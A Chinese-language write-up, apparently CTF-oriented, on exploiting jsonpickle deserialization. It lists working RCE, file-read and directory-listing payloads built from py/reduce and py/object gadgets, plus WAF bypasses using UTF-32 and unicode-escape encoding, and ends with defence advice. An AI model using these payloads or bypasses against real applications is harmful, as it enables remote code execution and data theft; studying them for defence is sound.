JsonPickle反序列化漏洞分析与利用技术<\/h1>

1. JsonPickle简介<\/h2>
JsonPickle是一个Python库，用于将复杂的Python对象序列化和反序列化为JSON格式。与Python内置的`json<\/code>库或第三方库如simplejson<\/code>、ujson<\/code>等只能处理基础数据类型不同，JsonPickle能够处理更复杂的Python对象。<\/p>`

1.1 基本功能<\/h3>

序列化：将Python对象转换为JSON字符串<\/li>
反序列化：将JSON字符串恢复为Python对象<\/li>
支持自定义JSON后端（如json<\/code>、simplejson<\/code>、ujson<\/code>等）<\/li>
<\/ul>
1.2 安全声明<\/h3>
官方文档明确指出：<\/p>

对于未受信任数据的反序列化，应考虑使用HMAC对数据进行签名<\/li>
或使用内置库JSON这种安全的反序列化方法<\/li>
CVE-2020-22083披露了不安全反序列化漏洞，但官方认为这是开发人员需要注意的问题<\/li>
<\/ul>
2. 反序列化流程分析<\/h2>
2.1 序列化示例<\/h3>
from<\/span> dataclasses import<\/span> dataclass
<\/span><\/span>from<\/span> time import<\/span> time
<\/span><\/span>import<\/span> jsonpickle
<\/span><\/span>
<\/span><\/span>@dataclass<\/span>
<\/span><\/span>class<\/span> Token<\/span>:
<\/span><\/span>    username: str
<\/span><\/span>    timestamp: int
<\/span><\/span>
<\/span><\/span>t =<\/span> Token("admin"<\/span>, int(time()))
<\/span><\/span>print(jsonpickle.<\/span>encode(t))
<\/span><\/span># 输出: {"py\/object": "__main__.Token", "username": "admin", "timestamp": 1733814799}<\/span>
<\/span><\/span><\/code><\/pre>2.2 反序列化核心流程<\/h3>
def<\/span> decode<\/span>(string, backend=<\/span>None<\/span>, context=<\/span>None<\/span>, keys=<\/span>False<\/span>, reset=<\/span>True<\/span>, safe=<\/span>True<\/span>, 
<\/span><\/span>           classes=<\/span>None<\/span>, v1_decode=<\/span>False<\/span>, on_missing=<\/span>'ignore'<\/span>, handle_readonly=<\/span>False<\/span>):
<\/span><\/span>    backend =<\/span> backend or<\/span> json
<\/span><\/span>    context =<\/span> context or<\/span> Unpickler(...<\/span>)
<\/span><\/span>    data =<\/span> backend.<\/span>decode(string)
<\/span><\/span>    return<\/span> context.<\/span>restore(data, reset=<\/span>reset, classes=<\/span>classes)
<\/span><\/span><\/code><\/pre>
使用JSON后端解析字符串为JSON对象<\/li>
根据JSON对象中的特殊标签恢复Python对象<\/li>
<\/ol>
3. 标签系统与利用技术<\/h2>
JsonPickle使用特殊标签来标识和恢复Python对象，以下是关键标签及其利用方式：<\/p>
3.1 核心标签<\/h3>
py\/object<\/code><\/h4>
标识一个Python对象，用于恢复类的实例<\/p>
py\/type<\/code><\/h4>
标识一个Python类型\/类<\/p>
py\/function<\/code><\/h4>
标识一个Python函数<\/p>
py\/module<\/code><\/h4>
标识一个Python模块<\/p>
py\/reduce<\/code><\/h4>
模拟pickle的__reduce__<\/code>魔术方法<\/p>
py\/repr<\/code><\/h4>
使用repr()<\/code>字符串恢复对象<\/p>
3.2 关键标签利用技术<\/h3>
py\/type<\/code>、py\/function<\/code>和py\/module<\/code>利用<\/h4>
这些标签都使用类似的机制加载类和函数：<\/p>
def<\/span> loadclass<\/span>(module_and_name, classes=<\/span>None<\/span>):
<\/span><\/span>    names =<\/span> module_and_name.<\/span>split('.'<\/span>)
<\/span><\/span>    for<\/span> up_to in<\/span> range(len(names)-<\/span>1<\/span>, 0<\/span>, -<\/span>1<\/span>):
<\/span><\/span>        module =<\/span> util.<\/span>untranslate_module_name('.'<\/span>.<\/span>join(names[:up_to]))
<\/span><\/span>        try<\/span>:
<\/span><\/span>            __import__(module)
<\/span><\/span>            obj =<\/span> sys.<\/span>modules[module]
<\/span><\/span>            for<\/span> class_name in<\/span> names[up_to:]:
<\/span><\/span>                obj =<\/span> getattr(obj, class_name)
<\/span><\/span>            return<\/span> obj
<\/span><\/span>        except<\/span> (AttributeError<\/span>, ImportError<\/span>, ValueError<\/span>):
<\/span><\/span>            continue<\/span>
<\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p>
{
<\/span><\/span>    "py\/mod"<\/span>: "__main__\/x.__dict__"<\/span>
<\/span><\/span>}
<\/span><\/span>{
<\/span><\/span>    "py\/function"<\/span>: "__main__.__dict__"<\/span>
<\/span><\/span>}
<\/span><\/span>{
<\/span><\/span>    "py\/type"<\/span>: "__main__.__dict__"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>py\/reduce<\/code>利用<\/h4>
模拟pickle的__reduce__<\/code>，可以执行任意函数：<\/p>
def<\/span> _restore_reduce<\/span>(self, obj):
<\/span><\/span>    reduce_val =<\/span> list(map(self.<\/span>_restore, obj[tags.<\/span>REDUCE]))
<\/span><\/span>    f, args =<\/span> reduce_val[0<\/span>], reduce_val[1<\/span>]
<\/span><\/span>    stage1 =<\/span> f(*<\/span>args)
<\/span><\/span>    return<\/span> stage1
<\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p>
{
<\/span><\/span>    "py\/reduce"<\/span>: [
<\/span><\/span>        {"py\/function"<\/span>: "builtins.eval"<\/span>}, 
<\/span><\/span>        {"py\/tuple"<\/span>: ["__import__('os').system('calc')"<\/span>]}
<\/span><\/span>    ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>py\/object<\/code>利用<\/h4>
直接实例化对象并调用：<\/p>
def<\/span> _restore_object_instance<\/span>(self, obj, cls, class_name=<\/span>''<\/span>):
<\/span><\/span>    args =<\/span> getargs(obj, classes=<\/span>self.<\/span>_classes)
<\/span><\/span>    kwargs =<\/span> {}
<\/span><\/span>    instance =<\/span> cls(*<\/span>args)
<\/span><\/span>    return<\/span> instance
<\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p>
{
<\/span><\/span>    "py\/object"<\/span>: "subprocess.run"<\/span>,
<\/span><\/span>    "py\/newargs"<\/span>: ["calc"<\/span>]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.3 其他有用的py\/object<\/code>利用<\/h3>

列目录：<\/li>
<\/ol>
{"py\/object"<\/span>: "glob.glob"<\/span>, "py\/newargs"<\/span>: ["\/*"<\/span>]}
<\/span><\/span>{"py\/object"<\/span>: "os.listdir"<\/span>, "py\/newargs"<\/span>: ["\/"<\/span>]}
<\/span><\/span><\/code><\/pre>
读文件：<\/li>
<\/ol>
{"py\/object"<\/span>: "linecache.getlines"<\/span>, "py\/newargs"<\/span>: ["\/flag"<\/span>]}
<\/span><\/span><\/code><\/pre>
RCE：<\/li>
<\/ol>
{"py\/object"<\/span>: "subprocess.getoutput"<\/span>, "py\/newargs"<\/span>: ["calc"<\/span>]}
<\/span><\/span>{"py\/object"<\/span>: "pickle.loads"<\/span>, "py\/newargs"<\/span>: [{"py\/b64"<\/span>: "KGNvcwpzeXN0ZW0KUydiYXNoIC1jICJjYWxjIicKby4="<\/span>}]}
<\/span><\/span>{"py\/object"<\/span>: "timeit.main"<\/span>, "py\/newargs"<\/span>: [["-r"<\/span>, "1"<\/span>, "-n"<\/span>, "1"<\/span>, "__import__(\"os\").system(\"calc\")"<\/span>]]}
<\/span><\/span>{"py\/object"<\/span>: "uuid._get_command_stdout"<\/span>, "py\/newargs"<\/span>: ["calc"<\/span>]}
<\/span><\/span>{"py\/object"<\/span>: "pydoc.pipepager"<\/span>, "py\/newargs"<\/span>: ["a"<\/span>, "calc"<\/span>]}
<\/span><\/span><\/code><\/pre>4. WAF绕过技术<\/h2>
4.1 编码绕过<\/h3>
JsonPickle默认使用json<\/code>作为后端，json.loads<\/code>支持多种编码：<\/p>
def<\/span> detect_encoding<\/span>(b):
<\/span><\/span>    if<\/span> b.<\/span>startswith((codecs.<\/span>BOM_UTF32_BE, codecs.<\/span>BOM_UTF32_LE)):
<\/span><\/span>        return<\/span> 'utf-32'<\/span>
<\/span><\/span>    if<\/span> b.<\/span>startswith((codecs.<\/span>BOM_UTF16_BE, codecs.<\/span>BOM_UTF16_LE)):
<\/span><\/span>        return<\/span> 'utf-16'<\/span>
<\/span><\/span>    if<\/span> b.<\/span>startswith(codecs.<\/span>BOM_UTF8):
<\/span><\/span>        return<\/span> 'utf-8-sig'<\/span>
<\/span><\/span>    # 其他检测逻辑...<\/span>
<\/span><\/span><\/code><\/pre>UTF-32-BE示例<\/strong>：<\/p>
import<\/span> jsonpickle
<\/span><\/span>import<\/span> codecs
<\/span><\/span>
<\/span><\/span>data =<\/span> '{"py\/object": "__main__.Token", "username": {"py\/reduce": [{"py\/function": "builtins.eval"}, {"py\/tuple": ["__import__(<\/span>\'<\/span>os<\/span>\'<\/span>).popen(<\/span>\'<\/span>whoami<\/span>\'<\/span>).read()"]}], "timestamp": 1733380109.0111294}'<\/span>
<\/span><\/span>
<\/span><\/span>with<\/span> open('exp_utf32_be.txt'<\/span>, 'w'<\/span>, encoding=<\/span>'utf-32-be'<\/span>) as<\/span> f:
<\/span><\/span>    f.<\/span>write(codecs.<\/span>BOM_UTF32_BE.<\/span>decode('utf-32-be'<\/span>) +<\/span> data)
<\/span><\/span>
<\/span><\/span>with<\/span> open('exp_utf32_be.txt'<\/span>, 'rb'<\/span>) as<\/span> f:
<\/span><\/span>    data_bytes =<\/span> f.<\/span>read()
<\/span><\/span>    token =<\/span> jsonpickle.<\/span>decode(data_bytes)
<\/span><\/span><\/code><\/pre>4.2 Unicode编码绕过<\/h3>
s =<\/span> json.<\/span>loads('{"a":"<\/span>\\<\/span>u0072<\/span>\\<\/span>u0065<\/span>\\<\/span>u0064<\/span>\\<\/span>u0075<\/span>\\<\/span>u0063<\/span>\\<\/span>u0065"}'<\/span>)
<\/span><\/span>print(json.<\/span>dumps(s))  # 输出: {"a": "reduce"}<\/span>
<\/span><\/span><\/code><\/pre>5. 防御建议<\/h2>

避免反序列化不可信数据<\/li>
使用safe=True<\/code>参数（但仍有部分风险）<\/li>
实现严格的WAF过滤：

检查py\/<\/code>前缀的特殊标签<\/li>
过滤危险函数和模块（如eval<\/code>、exec<\/code>、os<\/code>、subprocess<\/code>等）<\/li>
<\/ul>
<\/li>
使用HMAC签名验证数据完整性<\/li>
限制反序列化的类白名单<\/li>
<\/ol>
6. 总结<\/h2>
JsonPickle提供了强大的序列化和反序列化能力，但也带来了安全风险。攻击者可以通过精心构造的JSON payload利用各种标签实现RCE、文件操作等。防御关键在于严格验证输入数据、限制反序列化的类和使用安全的替代方案。<\/p>
JsonPickle反序列化漏洞分析与利用技术<\/h1>

2. 反序列化流程分析<\/h2>

3. 标签系统与利用技术<\/h2> JsonPickle使用特殊标签来标识和恢复Python对象，以下是关键标签及其利用方式：<\/p>

3.1 核心标签<\/h3>

4. WAF绕过技术<\/h2>

3. 标签系统与利用技术<\/h2>
JsonPickle使用特殊标签来标识和恢复Python对象，以下是关键标签及其利用方式：<\/p>
